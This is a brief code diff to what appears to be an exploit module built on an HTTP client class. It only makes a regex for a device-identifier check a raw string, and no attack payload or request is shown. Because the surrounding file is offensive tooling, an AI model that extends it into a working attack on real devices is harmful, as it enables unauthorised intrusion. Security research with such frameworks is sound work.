@@ -120,7 +120,7 @@ class Exploit(HTTPClient):
 
     def run(self):
         devices = self._Exploit__info__['devices']
-        if self.device == "" or re.match("^\d+?$", self.device) is None or int(self.device) < 0 or int(self.device) >= len(devices):
+        if self.device == "" or re.match(r"^\d+?$", self.device) is None or int(self.device) < 0 or int(self.device) >= len(devices):
             print_error("Invalid device identifier option")
             return
         number = devices[int(self.device)]['number']
